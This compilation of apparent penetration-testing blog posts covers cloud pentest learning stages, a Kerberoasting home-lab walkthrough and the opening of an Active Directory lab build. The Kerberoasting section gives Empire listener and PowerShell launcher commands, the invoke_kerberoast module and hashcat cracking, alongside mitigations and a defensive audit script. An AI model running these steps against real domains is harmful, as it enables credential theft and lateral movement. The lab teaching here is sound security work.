<h1>Cloud penetration testing: Not your typical internal penetration test</h1>
<p>Seth Art, 2022-12-15</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXV7zzj2x4zFuTNn8sU7Ga8kebQweNcDEMYedfrPMI3UNaOQ1NeC1oiXCfDonCK6sqHk5hdHnoNSpYFX2RFsIbzdR2fqj1hqlM_nypfF91QlE3wsnlOirJ5IDzVd1XjynglKLzjzfhlqIrqL6h9WDzVlJQaBD4KiiN60EhT73uO8Yi-FbQKJ3LyuWtew/s1195/Screenshot%202022-12-15%20at%207.22.06%20PM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="692" data-original-width="1195" height="370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXV7zzj2x4zFuTNn8sU7Ga8kebQweNcDEMYedfrPMI3UNaOQ1NeC1oiXCfDonCK6sqHk5hdHnoNSpYFX2RFsIbzdR2fqj1hqlM_nypfF91QlE3wsnlOirJ5IDzVd1XjynglKLzjzfhlqIrqL6h9WDzVlJQaBD4KiiN60EhT73uO8Yi-FbQKJ3LyuWtew/w640-h370/Screenshot%202022-12-15%20at%207.22.06%20PM.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p style="text-align: left;">There seems to be a common path for experienced penetration testers who are thrown into the world of cloud penetration testing. I'm talking about internal (aka assumed breach) tests, where the goal is to demonstrate the impact of a compromised user with access to the cloud or a compromised application in the cloud. </p><p style="text-align: left;">The path usually starts with ignorance, is followed by total confusion and questioning everything you know about penetration testing, and ends with… well, it never ends. Why? Because the cloud providers and the cloud native technologies running in these clouds keep evolving at a remarkable rate. 
There's always more to learn and more attack paths waiting to be found.</p><p style="text-align: left;">I hope walking through my own path and defining the stages of ignorance and awareness I encountered in a playful way might help others progress through the early stages more quickly than I did. </p><h2 style="text-align: left;">Level 1: This is just like any other Internal Penetration Test, right?</h2><p>You connect to your assumed breach starting point within the internal cloud network: something like Kali running on an EC2 instance. You run <i>nmap</i> against the VPC’s internal /16 and hope for the best. You quickly realize there might be a better way to do this. </p><h2 style="text-align: left;">Level 2: You get your first spark of harnessing cloud magic </h2><p>You realize if you ask for and receive IAM credentials for the target environment, you can use those cloud credentials and the AWS API to enumerate the IP addresses of all the EC2 instances in the account, and then <i>nmap</i> only those IP addresses. You pat yourself on the back and think you might actually be a cloud security expert now. Unfortunately, you still think that the scope of the cloud attack surface is limited to the services running on EC2. Such a level 2 move. </p><h2 style="text-align: left;">Level 3: Woah. There is more than just EC2!?!</h2><p>You realize if you have Route53 access, you can enumerate all of the A records in AWS managed DNS zones, and this makes you very happy. Lots of new attack surface area. You start to find things hosted by other services, like Kubernetes, ECS, API Gateway, ELB, etc. You might not realize yet what Kubernetes, ECS, API Gateway, and ELB do, but that's OK at level 3. The important thing is that you have more things to hack. 
Go find those services with default credentials, SSRF vulns, missing authentication, etc., and have some fun!</p><h2 style="text-align: left;">Level 4: You become woke to IAM PrivEsc</h2><p>You start to learn about what IAM is and how it can be misconfigured. You learn about IAM privilege escalation. You exploit the <i>ec2:RunInstances</i> + <i>iam:PassRole</i> attack path and gain administrative access to the AWS account. Or, you pop a service and realize that service has an IAM role that can assume other IAM roles. You realize, like all of those before you, that Spencer Gietzen was a really smart dude who shared a ton of amazing info with the community, and you get hungry to learn more about IAM privesc. You should probably check out <a href="https://bishopfox.com/blog/aws-iam-privilege-escalation-playground">IAM Vulnerable</a> at this point.</p><h2 style="text-align: left;">Level 5: A secret in the wrong place can be pretty bad</h2><p>You start to look at other key AWS services like S3, Lambda, ECR, EKS, CloudFormation and you start to see patterns that lead to other (non-IAM) types of privilege escalation: A secret stored in the wrong place (S3 bucket object, Kubernetes secret, Lambda environment variable, EC2 user-data, etc.) can provide unintended privilege escalation opportunities. It reminds you of finding passwords in PowerShell scripts accessible via SMB shares and you get nostalgic. </p><h2 style="text-align: left;">Level 6: You start to think in graphs, and even work backwards </h2><p>You are now always looking for secrets, vulnerable software, and misconfigured IAM policies in the environment. But when you find these, you now work backward and focus on <b>who</b> has access to that secret/vuln software/IAM policy, and you build and execute attack paths that demonstrate that user X has paths to the penetration test trophy targets. 
You also realize there can be relationships between AWS accounts, like how multiple Active Directory domains can be connected in a single forest. You look for ways that access from a lower-trust account can be used to gain access to the higher-trust accounts (e.g., role trusts) and your attack chains become even more impactful. </p><h2 style="text-align: left;">Level 7: CI/CD Tooling is a freaking gold mine </h2>You're testing ACME corp, an organization that is fairly mature from a security perspective. Nobody has <i>write</i> permissions to the production cloud environments except for the Ops team and the automated deployment tooling. But, you realize all of the developers DO have access to the continuous deployment tooling, and as it turns out RBAC is not enforced here. You realize this means all developers have access to all of the secrets in the CI/CD tooling software, so you grab the admin creds to the production cloud environment, complete the assessment objectives, and do a victory dance. You file this in the "things I always need to look for" category. It rarely disappoints. <h2>Level 8: You start to think tech monopolies are a good thing</h2><div>You're feeling really good about cloud security these days. (You can tell that I personally have spent the most time on AWS, but your journey might start with GCP, Azure, or even one of the others.) But eventually, you'll need to run a penetration test in another one of the public clouds, and you very quickly notice there are really big differences between them. You start to pine for the ubiquity of Active Directory. You take solace in the fact that at least half of your cloud penetration testing methodology is cloud agnostic and applies to all cloud providers. But you get sad every time you have to start over and learn the ins and outs of a new cloud provider. On that note, you also get a little sad when you have to context switch to a cloud provider you have not seen in a while. 
</div><h2 style="text-align: left;">Level 9: I know nothing about the cloud</h2><div style="text-align: left;">The more you learn about cloud penetration testing, the more confident you are that you don’t know anything about the cloud. You've learned that the attack surface area of each organization depends entirely on the specific services that the target organization uses, how the org deploys those services, how all of the services interact with each other, and how they interact with third-party services. In other words, you know the general approaches you need to take, but are resigned to the fact that you will be learning new cloud services and new cloud native technologies for the foreseeable future. </div><div style="text-align: left;"><h2 style="text-align: left;">Honorable mentions:</h2></div><div style="text-align: left;"><ul style="text-align: left;"><li>Why isn't Responder working as expected in the cloud?</li><li>Hey Google: "What is cloud native?", "What is serverless?", and "What is Kubernetes?"</li><li>Azure Active Directory is Azure's managed Active Directory, right? RIGHT!?</li></ul></div><div style="text-align: left;">What were some of the "ah-ha" moments in your cloud penetration testing journey?</div><h2 style="text-align: left;">Wrap Up</h2><div style="text-align: left;">If you are interested in learning more about cloud hacking in general, but in an easy to read format, check out this excellent book by Sparc Flow: <a href="https://www.amazon.com/Hack-Like-Ghost-Sparc-Flow/dp/1718501269/" target="_blank">How to Hack like a Ghost</a>. 
</div><div style="text-align: left;"><br /></div><div style="text-align: left;">If you want an idea of how we perform objective-based Cloud Penetration Testing at Bishop Fox, check out <a href="https://bishopfox.com/services/cloud-penetration-testing">this page</a>, or the talk I gave called <a href="https://www.youtube.com/watch?v=ScBgca_zCCo" target="_blank">Penetrating the Cloud: Uncovering Unknown Vulnerabilities</a>.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Also, check out <a href="https://github.com/BishopFox/cloudfox" target="_blank">CloudFox</a>, a tool Carlos Vendramini and I created at Bishop Fox to help automate the process of gaining situational awareness in cloud environments. </div><div style="text-align: left;"><br /></div><div style="text-align: left;">Lastly, there are some amazing open source knowledge bases available as well: <br /><ul style="text-align: left;"><li><a href="https://hackingthe.cloud/">https://hackingthe.cloud/</a></li><li><a href="https://cloudsecdocs.com/">https://cloudsecdocs.com/</a></li><li><a href="https://www.secwiki.cloud/">https://www.secwiki.cloud/</a></li><li><a href="https://cloudsecwiki.com/">https://cloudsecwiki.com/</a></li></ul></div><div style="text-align: left;">Happy cloud hacking! If you'd like to chat about cloud security, hit me up on the Cloud Security Forum Slack (sethsec) or on Mastodon @ <a href="https://infosec.exchange/@sethsec">https://infosec.exchange/@sethsec</a>. </div>
<h1>Pentest Home Lab - 0x3 - Kerberoasting: Creating SPNs so you can roast them</h1>
<p>Seth Art, 2017-08-31</p>
<h2>
TL;DR</h2>
There are a lot of great blogs out there that show you how to Kerberoast. In this post, I'm going to walk through the process of setting up your lab so that you can practice this attack. This involves creating a domain user and then mapping a SPN to that account. After that, I'll walk through using Empire to launch Invoke-Kerberoast, and I'll crack the hashes offline with Hashcat. <br />
<br />
<h2>
Pentest Home Lab Recap</h2>
If you don't already have an Active Directory lab and want to build one so that you can play along, check out my previous posts:<br />
<ul>
<li><a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x0-building-virtual.html">Pentest Home Lab - 0x0 - Building A Virtual Corporate Domain</a> </li>
<li><a href="https://sethsec.blogspot.com/2017/05/pentest-home-lab-0x1-building-your-ad.html" target="">Pentest Home Lab - 0x1 - Building Your AD Lab on AWS</a></li>
<li><a href="https://sethsec.blogspot.com/2017/06/pentest-home-lab-0x2-building-your-ad.html" target="">Pentest Home Lab - 0x2 - Building Your AD Lab on Premises using Proxmox VE</a></li>
</ul>
<br />
<h2>
The Attack: Kerberoasting</h2>
<h4>
Attack Goals</h4>
Domain privesc &amp; lateral movement. If you have domain credentials and access to the domain, this is a relatively easy way to gain additional access within the domain. If all goes well, you'll end up with new domain credentials that might have administrative access to additional resources.<br />
<br />
<h4>
Attack Prerequisites</h4>
In order to Kerberoast, you either need to have:<br />
<ul>
<li>Interactive access to a domain connected machine (you are logged on)</li>
<li>Remote access to a domain connected machine via Metasploit, Empire, CobaltStrike, etc.</li>
<li>A valid set of domain credentials and be on the network (Impacket, Crackmapexec, etc.)</li>
</ul>
Common ways you get this type of access are:<br />
<ul>
<li>You phished someone</li>
<li>You gained physical access to an unlocked machine</li>
<li>You have network access and performed LLMNR/NBT-NS spoofing with a tool like Responder to get domain credentials</li>
</ul>
<h2>
Creating SPNs in your Lab</h2>
Before creating our SPN, let's briefly review what a SPN is, in Microsoft's words:<br />
<div>
<span style="color: #2a2a2a; font-family: "segoe ui" , "lucida grande" , "verdana" , "arial" , "helvetica" , sans-serif; font-size: 13px;">"<i>A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by </i></span><a href="https://msdn.microsoft.com/en-us/library/ms677600(v=vs.85).aspx" style="color: #00709f; font-family: "Segoe UI", "Lucida Grande", Verdana, Arial, Helvetica, sans-serif; font-size: 13px; text-decoration-line: none;"><i>Kerberos authentication</i></a><span style="color: #2a2a2a; font-family: "segoe ui" , "lucida grande" , "verdana" , "arial" , "helvetica" , sans-serif; font-size: 13px;"><i> to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.</i>" </span></div>
Source: <a href="https://msdn.microsoft.com/en-us/library/ms677949(v=vs.85).aspx">https://msdn.microsoft.com/en-us/library/ms677949(v=vs.85).aspx</a><br />
<div>
<br /></div>
<div>
I used to think you needed to install a service like IIS or SQL Server in order to set this up in your lab. Good news: Setting this up in the lab is much easier than that. All you need to do is execute the <i>setspn</i> command as a domain administrator and map a SPN to a valid account. </div>
<br />
<h4>
Step 1 - Create a new domain account for the test</h4>
If using PowerShell to create the user, you'll need to run this from the domain controller or another machine that has the ActiveDirectory PowerShell module installed. You'll also need to run this as a domain administrator or another account that has rights to add a new user:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">PS C:\> </span><span style="color: red; font-family: "courier new" , "courier" , monospace;">New-ADuser -Name "<user_name>" -SamAccountName <user_name> -Enabled $true -AccountPassword(Read-host -AsSecureString "AccountPassword")</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">AccountPassword: </span><span style="color: red; font-family: "courier new" , "courier" , monospace;"><Password here></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-AdnY45K0efw/WZPBBKl6nFI/AAAAAAAABdQ/-PknHdV3ssE7cEz5e7AXncgT1OB3bf-mwCLcBGAs/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="107" data-original-width="836" height="80" src="https://4.bp.blogspot.com/-AdnY45K0efw/WZPBBKl6nFI/AAAAAAAABdQ/-PknHdV3ssE7cEz5e7AXncgT1OB3bf-mwCLcBGAs/s640/1.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<h4>
Step 2 - Use setspn to create a SPN and map it to your new account</h4>
<br />
<span style="font-family: "courier new" , "courier" , monospace;">PS C:\></span><span style="font-family: "courier new" , "courier" , monospace;"> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: red;">setspn -A <user_name>/<hostname>.<domain>:<port> <user_name></span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-31IydfrO_lk/WZPBF8BVlzI/AAAAAAAABdU/GRDgkd2f-lUq-11CnPgqr85UmsudnGXgACEwYBhgL/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="183" data-original-width="838" height="137" src="https://1.bp.blogspot.com/-31IydfrO_lk/WZPBF8BVlzI/AAAAAAAABdU/GRDgkd2f-lUq-11CnPgqr85UmsudnGXgACEwYBhgL/s640/3.png" width="640" /></a></div>
<br />
<b>Step 3 (Optional) - Verify your SPN was created</b><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">PS C:\></span><span style="font-family: "courier new" , "courier" , monospace;"> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: red;">setspn -Q */* | findstr <user_name></span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-Hr9fIT01z4g/WZPDSjyP3MI/AAAAAAAABdg/JaIbt9yEByA06rNK4ob8mYvD11Ov-DIXACLcBGAs/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="88" data-original-width="573" height="97" src="https://2.bp.blogspot.com/-Hr9fIT01z4g/WZPDSjyP3MI/AAAAAAAABdg/JaIbt9yEByA06rNK4ob8mYvD11Ov-DIXACLcBGAs/s640/4.png" width="640" /></a></div>
That was easier than expected, right? Another lesson I learned along the way: You can create a SPN for a service that does not exist. For instance, you can do this:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">PS C:\></span><span style="font-family: "courier new" , "courier" , monospace;"> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: red;">setspn -A TEST/test IIS_008</span></span><br />
<br />
TEST/test is not a real service, but IIS_008 is a real user, so the SPN is created and you can now use it to crack IIS_008's password.<br />
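<div>The three steps above as one script, added here as an example and not part of the original post. It uses the ActiveDirectory module's <i>Set-ADUser</i> in place of <i>setspn.exe</i>, refuses to register an SPN that already belongs to another account, and can be re-run safely. The account name, SPN and password are lab placeholders; run it on the DC (or a host with RSAT) as a domain admin.</div>

```powershell
# Added example, not from the original post: create the lab account, map an SPN to it,
# and verify the mapping, using the ActiveDirectory module instead of setspn.exe.
# Run on the DC (or a host with RSAT) as a domain admin. Values below are lab placeholders.
Import-Module ActiveDirectory

$UserName = 'IIS_008'                          # same lab account name the post uses
$Spn      = 'HTTP/web01.lab.local:8080'        # hypothetical SPN; the service does not need to exist
# A deliberately weak, wordlist-style password so the lab hash is actually crackable.
$Password = ConvertTo-SecureString 'Summer2017!' -AsPlainText -Force

# Step 1: create the account only if it is not already there, so re-runs are harmless.
if (-not (Get-ADUser -Filter "SamAccountName -eq '$UserName'")) {
    New-ADUser -Name $UserName -SamAccountName $UserName -Enabled $true `
        -AccountPassword $Password -Description 'Kerberoast lab target'
}

# Step 2: equivalent of "setspn -A <spn> <user>". An SPN registered on two accounts
# breaks Kerberos for the real service, so check for an existing owner first.
$owner = Get-ADObject -Filter "ServicePrincipalName -eq '$Spn'"
if ($owner) {
    if ($owner.Name -ne $UserName) {
        throw "SPN $Spn is already registered to $($owner.DistinguishedName)"
    }
    # Already mapped to our lab account; nothing to do.
} else {
    Set-ADUser -Identity $UserName -ServicePrincipalNames @{Add = $Spn}
}

# Step 3: equivalent of "setspn -Q */* | findstr <user>".
Get-ADUser -Identity $UserName -Properties ServicePrincipalName, PasswordLastSet |
    Select-Object SamAccountName, PasswordLastSet,
        @{ Name = 'SPNs'; Expression = { $_.ServicePrincipalName -join '; ' } }
```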
<br />
<h2>
Attack Walk through</h2>
<div>
Here are some posts that helped me wrap my head around this attack: </div>
<div>
<br /></div>
<div>
<a href="https://room362.com/post/2016/kerberoast-pt1/">KERBEROASTING - PART 1</a>, <a href="https://room362.com/post/2016/kerberoast-pt2/">Part 2</a>, <a href="https://room362.com/post/2016/kerberoast-pt3/">Part 3</a> - Mubix</div>
<a href="https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/">Kerberoasting Without Mimikatz</a> - harmj0y<br />
<div>
<a href="http://springtime%20kerberoasting/">Springtime Kerberoasting</a></div>
<div>
<a href="https://www.youtube.com/watch?v=PUyhlN-E5MU">Attacking Microsoft Kerberos Kicking the Guard Dog of Hades Tim Medin</a><br />
<div>
<br /></div>
<div>
As you will find in all of those great posts (and many others), there are lots of different tools that you can use to perform the Kerberoast attack. This part has been widely covered, but I still want to include the attack walk-through in this post for completeness. I'll quickly walk through what I consider to be a really easy, reliable way to execute this attack in your lab:<br />
<br /></div>
<h4>
Step 1 - Install or update Empire</h4>
<div>
Install: </div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">root@Kali-Rolling:~# </span><span style="color: red; font-family: "courier new" , "courier" , monospace;">cd /opt/</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">root@Kali-Rolling:/opt# <span style="color: red;">git clone</span> <span style="color: red;">https://github.com/EmpireProject/Empire.git</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">root@Kali-Rolling:~# <span style="color: red;">cd /opt/Empire/setup/</span></span></div>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">root@Kali-Rolling:/opt/Empire/setup# <span style="color: red;">./install.sh</span></span></div>
</div>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">root@Kali-Rolling:/opt/Empire/setup# <span style="color: red;">cd ..</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">root@Kali-Rolling:/opt/Empire# <span style="color: red;">./empire</span></span></div>
</div>
<div>
<br /></div>
<div>
Updating:<br />
*If you have Empire installed but you have not updated Empire since 8/31/2017, git pull to current. There were some bug fixes and improvements made to the Invoke-Kerberoast module between the 27th and the 31st. You'll likely have to rerun the install script (make a backup first) as there were some major changes in v2.1 that require new dependencies.<br />
<br /></div>
<h4>
Step 2 - Start Empire, generate powershell payload</h4>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire) > </span><span style="color: red; font-family: "courier new" , "courier" , monospace;">listeners</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: listeners) > <span style="color: red;">uselistener http</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: listeners/http) > </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: red;">info</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: listeners/http) > </span><span style="color: red; font-family: "courier new" , "courier" , monospace;">set Host http://<ip>:<port></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: listeners/http) > </span><span style="color: red; font-family: "courier new" , "courier" , monospace;">info</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: listeners/http) > </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: red;"><span style="color: red;">execute</span></span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: listeners/http) > <span style="color: red;">launcher powershell</span></span></div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-lyvkWPXFoQM/WZPIka8XodI/AAAAAAAABd8/yhDYnmY0fo8qr6LMBeJgtsq9nEF-Kp7cACLcBGAs/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="323" data-original-width="490" height="262" src="https://1.bp.blogspot.com/-lyvkWPXFoQM/WZPIka8XodI/AAAAAAAABd8/yhDYnmY0fo8qr6LMBeJgtsq9nEF-Kp7cACLcBGAs/s400/5.png" width="400" /></a></div>
<br />
If you have any questions about setting this up, check out <a href="https://www.powershellempire.com/?page_id=110">https://www.powershellempire.com/?page_id=110</a>, leave a comment here, or both :)<br />
<br /></div>
<h4>
Step 3 - Execute payload on the domain connected victim machine as a low level user</h4>
<div>
1) Log into workstation in the lab as a low level domain user</div>
<div>
2) Execute the powershell command generated by Empire</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-O7kHFFd5jAA/WZPJ6oH0O2I/AAAAAAAABeM/1M_J5ggNX7AGA7ITCpnKBExtHE6C2caTACLcBGAs/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="559" height="175" src="https://1.bp.blogspot.com/-O7kHFFd5jAA/WZPJ6oH0O2I/AAAAAAAABeM/1M_J5ggNX7AGA7ITCpnKBExtHE6C2caTACLcBGAs/s400/7.png" width="400" /></a></div>
<br /></div>
<h4>
Step 4 - Back on your attack box, interact with victim and execute Invoke-Kerberoast</h4>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: listeners/http) > <span style="color: red;">main</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire) > <span style="color: red;">interact <tab complete to find your agent ID></span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: ADY86TPS) > <span style="color: red;">usemodule credentials/invoke_kerberoast</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: powershell/credentials/invoke_kerberoast) > <span style="color: red;">set OutputFormat Hashcat</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: powershell/credentials/invoke_kerberoast) > <span style="color: red;">run</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-p56yyKLbtso/WZ_FysoqiII/AAAAAAAABfQ/9Y9FeQB1KfwiI2z_CbPsaPm37Ly6bWHgACLcBGAs/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="484" data-original-width="874" height="354" src="https://4.bp.blogspot.com/-p56yyKLbtso/WZ_FysoqiII/AAAAAAAABfQ/9Y9FeQB1KfwiI2z_CbPsaPm37Ly6bWHgACLcBGAs/s640/10.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br /></div>
<div>
<b>Step 5 - Crack hash with Hashcat</b></div>
<div>
<br />
Copy the hashes that Empire spits out into a text file on your password cracker, and let it rip:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">root@cracker:/opt/hashcat-3.30# </span><span style="color: red; font-family: "courier new" , "courier" , monospace;">./hashcat64.bin -m 13100 -r rules/<rules_file> <path to hashes file> <path to wordlist></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Q2Oq_DxdurE/WagdFPJgEQI/AAAAAAAABgQ/JDN0Jj5Lybs7PRPiEx1UMUXyJewUmncrQCLcBGAs/s1600/11a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="117" data-original-width="637" height="115" src="https://1.bp.blogspot.com/-Q2Oq_DxdurE/WagdFPJgEQI/AAAAAAAABgQ/JDN0Jj5Lybs7PRPiEx1UMUXyJewUmncrQCLcBGAs/s640/11a.png" width="640" /></a></div>
<br />
And here is a cracked domain account (if you scroll up to the top of that hash on your own machine, you will see the username of the hash you just cracked). </div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-mFk8ju3wCII/WagXZL4CqbI/AAAAAAAABgA/C-ACXKby_ms2U3YPUJKX_1kELvSWFd2YQCLcBGAs/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="370" data-original-width="498" height="296" src="https://3.bp.blogspot.com/-mFk8ju3wCII/WagXZL4CqbI/AAAAAAAABgA/C-ACXKby_ms2U3YPUJKX_1kELvSWFd2YQCLcBGAs/s400/12.png" width="400" /></a></div>
<br />
<h2>
Wrap Up</h2>
</div>
</div>
<div>
You did it. You created a SPN in your Active Directory lab, you used the Kerberoast attack to pull out a password hash, and you cracked the password hash with Hashcat. Feel free to create some more to make the attack feel more realistic. </div>
<div>
<br /></div>
<div>
<b>How does an organization prevent this from happening? </b></div>
<div>
<ul>
<li>Make sure all accounts that have a SPN tied to them (usually service accounts) have a difficult-to-crack password. Something random and long. </li>
<li>Disable interactive login whenever you can for service accounts. That password doesn't do us nearly as much good if interactive login is disabled and we can't connect to a server with it. </li>
</ul>
</div>
<div>
For much more detailed remediation and detection recommendations, check out Sean Metcalf's blog post: <a href="https://adsecurity.org/?p=3458">Detecting Kerberoasting Activity</a>, specifically the section: Mitigating Kerberoast Attack Activity</div>
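<div>A read-only audit for the first mitigation above, added here as an example and not from this post or from Sean Metcalf's article: it lists every enabled user account that carries an SPN (the Kerberoastable set), uses password age as a proxy for rotation, and flags any such account that also sits in a privileged group. The age threshold and the group list are assumptions; adjust them to your policy. Interactive-logon rights are set by GPO and are not visible on the user object, so that check is not included.</div>

```powershell
# Added example, not from the original post: read-only audit of Kerberoastable accounts.
# Needs the ActiveDirectory module and read access to the domain; it changes nothing.
Import-Module ActiveDirectory

$MaxPasswordAgeDays = 365    # assumption: rotation threshold; use your own policy value
$PrivilegedGroups   = @('Domain Admins', 'Enterprise Admins', 'Administrators', 'Account Operators')
$Now = Get-Date

# Any domain user can request a service ticket for any SPN on an enabled user account,
# so that is the roastable set. Computer accounts carry SPNs too but use long random
# machine passwords, and krbtgt's SPN cannot be requested, so both are excluded.
$Roastable = Get-ADUser -Filter 'ServicePrincipalName -like "*" -and Enabled -eq $true' `
        -Properties ServicePrincipalName, PasswordLastSet, MemberOf |
    Where-Object { $_.SamAccountName -ne 'krbtgt' }

$Report = foreach ($acct in $Roastable) {
    # -1 marks "never set", which is treated as a finding just like a stale password.
    $ageDays = if ($acct.PasswordLastSet) { [int]($Now - $acct.PasswordLastSet).TotalDays } else { -1 }

    # Direct group membership only; nested membership is not resolved here.
    $privs = @(foreach ($dn in $acct.MemberOf) {
        if ($dn -match '^CN=([^,]+),' -and $PrivilegedGroups -contains $Matches[1]) { $Matches[1] }
    })

    [pscustomobject]@{
        Account         = $acct.SamAccountName
        SPNs            = ($acct.ServicePrincipalName -join '; ')
        PasswordAgeDays = $ageDays
        PrivilegedIn    = ($privs -join ', ')
        # Finding: stale or never-set password, or a roastable account that is also privileged
        # (cracking it would hand over admin rights rather than just a service account).
        Finding         = ($ageDays -lt 0 -or $ageDays -gt $MaxPasswordAgeDays -or $privs.Count -gt 0)
    }
}

# Findings first, oldest passwords at the top.
$Report | Sort-Object Finding, PasswordAgeDays -Descending | Format-Table -AutoSize
```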
<h1>Pentest Home Lab - 0x2 - Building Your AD Lab on Premises</h1>
<p>Seth Art, 2017-06-06</p>
In <a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x0-building-virtual.html">Pentest Home Lab - 0x0 - Building a virtual corporate domain</a>, we talked about why you would want to build your own AD pentest lab, where you can build it, and the pros and cons of each option.<br />
<br />
In <a href="https://sethsec.blogspot.com/2017/05/pentest-home-lab-0x1-building-your-ad.html">Pentest Home Lab - 0x1 - Building Your AD Lab on AWS</a>, we walked through setting up a fully functional home lab in AWS. <br />
<br />
<div>
In this third installment, I'm going to walk through setting up a pentest Active Directory home lab in your basement, closet, etc. I'll be using Proxmox VE, an open source virtualization environment (aka hypervisor) similar to VMware ESXi or Citrix XenServer.<br />
<br />
<h2>
The series so far:</h2>
<div>
<ul>
<li><a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x0-building-virtual.html">Pentest Home Lab - 0x0 - Building A Virtual Corporate Domain</a></li>
<li><a href="https://sethsec.blogspot.com/2017/05/pentest-home-lab-0x1-building-your-ad.html" target="">Pentest Home Lab - 0x1 - Building Your AD Lab on AWS</a></li>
<li><a href="https://sethsec.blogspot.com/2017/06/pentest-home-lab-0x2-building-your-ad.html" target="">Pentest Home Lab - 0x2 - Building Your AD Lab on Premises using Proxmox VE</a> (This post)</li>
<li><a href="https://sethsec.blogspot.com/2017/08/pentest-home-lab-0x3-kerberoasting.html">Pentest Home Lab - 0x3 - Kerberoasting: Creating SPNs so you can roast them</a></li>
</ul>
</div>
</div>
<div>
<br />
<h2>
Table of Contents</h2>
<br />
<ul>
<li>What are we going to build?</li>
<li>Example server specs</li>
<li>Let's talk about network placement</li>
<li>Installing the hypervisor (Proxmox VE)</li>
<li>Getting Windows server software</li>
<ul>
<li>Obtaining evaluation version of Windows server</li>
<li>Downloading Windows 10 ISO</li>
</ul>
<li>Transferring ISOs to Proxmox</li>
<li>VM #1: Creating our Server 2012r2 template</li>
<ul>
<li>Configuring a Proxmox VM (Windows server 2012r2)</li>
<li>Installing Windows Server 2012r2</li>
<li>Converting a VM to a template in Proxmox</li>
</ul>
<li>VM #2: Creating your 2012r2 domain controller</li>
<ul>
<li>Creating a new VM by cloning your template</li>
<li>Promoting your first server to a DC</li>
<li>You now have an Active Directory Domain - Add some users</li>
<li>Add at least one admin user to your domain admins group</li>
</ul>
<li>VM #3: Creating your second 2012r2 server</li>
<ul>
<li>Configuring DNS</li>
<li>Adding host to the domain</li>
<li>Adding domain users to the remote desktop group</li>
</ul>
<li>VM #4: Creating our Windows 10 Template</li>
<li>VMs #5 & #6: Creating two Windows 10 VMs from the template</li>
</ul>
</div>
<div>
<br />
<h2>
What are we going to build?</h2>
<div>
At the end of this post, <b>you will have a fully functional AD environment running on ProxmoxVE </b>that you can use to make yourself a better penetration tester. I'm not going to assume you are familiar with ProxmoxVE or setting up Active Directory, so some of this might be review. </div>
